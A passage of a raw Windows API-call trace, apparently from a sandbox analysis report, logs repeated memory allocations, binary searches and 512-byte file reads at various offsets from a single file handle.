0x4397060 [0251.708] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d847d8 [0251.708] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4395b00 [0251.708] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84328 [0251.708] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x3aaa90 [0251.709] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84350 [0251.709] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x3aaaf0 [0251.709] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84558 [0251.709] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x3a9fb0 [0251.709] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84300 [0251.709] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x3aa0d0 [0251.709] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84328 [0251.709] LocalFree (hMem=0x5cff9c0) returned 0x0 [0251.709] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfe310 [0251.709] SetFilePointer (in: hFile=0xb48, lDistanceToMove=67584, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0x10800 [0251.709] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfe310, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cfe310*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.709] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x386830 [0251.709] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84350 [0251.710] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x386110 [0251.710] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84ad0 [0251.710] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x386230 [0251.710] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84300 [0251.710] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x386290 [0251.710] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84dc8 [0251.710] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d76c10 [0251.710] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84e40 [0251.710] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d76790 [0251.710] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84580 [0251.711] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x5d767f0 [0251.711] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84300 [0251.711] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x3653b0 [0251.711] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84328 [0251.711] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x365bf0 [0251.711] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84350 [0251.711] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x365c50 [0251.711] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d845a8 [0251.711] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4375880 [0251.712] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84300 [0251.712] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x3355b0 [0251.712] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84328 [0251.712] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431c10 [0251.712] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84350 [0251.712] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431070 [0251.712] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.712] LocalFree (hMem=0x5cfe310) returned 0x0 [0251.712] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfdef0 [0251.712] SetFilePointer (in: hFile=0xb48, lDistanceToMove=56832, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0xde00 [0251.712] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfdef0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cfdef0*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430ad0 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44314f0 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431d90 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432090 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431d30 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430b30 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431130 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431010 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431f70 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430a70 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.713] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431df0 [0251.713] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430bf0 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431e50 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431c70 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalFree (hMem=0x5cfdef0) returned 0x0 [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfdad0 [0251.714] SetFilePointer (in: hFile=0xb48, lDistanceToMove=62976, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0xf600 [0251.714] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfdad0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cfdad0*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431cd0 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431a30 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44320f0 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431970 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44312b0 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.714] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44313d0 [0251.714] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430d70 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430b90 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431a90 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432150 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430c50 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44319d0 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430f50 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430cb0 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.715] LocalFree (hMem=0x5cfdad0) returned 0x0 [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfce70 [0251.715] SetFilePointer (in: hFile=0xb48, lDistanceToMove=57344, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0xe000 [0251.715] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfce70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cfce70*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.715] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431af0 [0251.715] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431430 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430a10 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44310d0 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44315b0 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431b50 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430d10 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431310 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430dd0 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430e90 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431490 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431eb0 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.716] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431f10 [0251.716] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431fd0 [0251.717] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.717] LocalFree (hMem=0x5cfce70) returned 0x0 [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfdef0 [0251.717] SetFilePointer (in: hFile=0xb48, lDistanceToMove=41984, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0xa400 [0251.717] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfdef0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cfdef0*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430e30 [0251.717] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431250 [0251.717] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430ef0 [0251.717] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432030 [0251.717] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4430fb0 [0251.717] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44321b0 [0251.717] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431bb0 [0251.717] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431190 [0251.717] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44311f0 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431550 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431610 [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431670 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44316d0 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431370 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431730 [0251.718] LocalFree (hMem=0x5cfdef0) returned 0x0 [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x200) returned 0x5cfce70 [0251.718] SetFilePointer (in: hFile=0xb48, lDistanceToMove=58880, lpDistanceToMoveHigh=0x235e5a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e5a8*=0) returned 0xe600 [0251.718] ReadFile (in: hFile=0xb48, lpBuffer=0x5cfce70, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x235e5b8, lpOverlapped=0x0 | out: lpBuffer=0x5cfce70*, lpNumberOfBytesRead=0x235e5b8*=0x200, lpOverlapped=0x0) returned 1 [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431790 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44317f0 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431850 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.718] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x44318b0 [0251.718] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4431910 [0251.719] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432f90 [0251.719] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432510 [0251.719] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432c90 [0251.719] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432e70 [0251.719] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432450 [0251.719] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432390 [0251.719] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x4c) returned 0x4432db0 [0251.719] bsearch (_Key=0x235e5e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalFree (hMem=0x5cfce70) returned 0x0 [0251.719] LocalFree (hMem=0x5cfe100) returned 0x0 [0251.719] bsearch (_Key=0x235e4e8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) [0251.719] LocalAlloc (uFlags=0x40, uBytes=0xc54) returned 0xd1d6e20 [0251.719] SetFilePointer (in: hFile=0xb48, lDistanceToMove=84224, lpDistanceToMoveHigh=0x235e4a8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4a8*=0) returned 0x14900 [0251.719] ReadFile (in: hFile=0xb48, lpBuffer=0xd1d6e20, nNumberOfBytesToRead=0xc54, lpNumberOfBytesRead=0x235e4b8, lpOverlapped=0x0 | out: lpBuffer=0xd1d6e20*, lpNumberOfBytesRead=0x235e4b8*=0xc54, lpOverlapped=0x0) returned 1 [0251.719] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd197ea0 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0xd1dc480 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0xbe0) returned 0xd342010 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1dc4b0 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5ce1dd0 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1dc7e0 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x71) returned 0xd209b30 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1da290 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x349) returned 0xd1b7ca0 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1da530 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x183) returned 0x5c28610 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1d9de0 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197a40 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1d9e40 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197cc0 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1d9ed0 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197d60 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1dbc40 [0251.720] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197d00 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1dbcd0 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197c00 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1db460 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd197e40 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1db610 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197a60 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1db520 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197d20 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0xd1db6a0 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197c20 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x443a150 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197fc0 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x443a000 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197c40 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4439f10 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197d40 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x443a180 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197e80 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x443a1b0 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x443a1e0 [0251.721] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4439c10 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x44386b0 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x44382f0 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd198000 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4438350 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0xd197d80 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x4439550 [0251.722] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0xd197da0 [0251.722] LocalAlloc 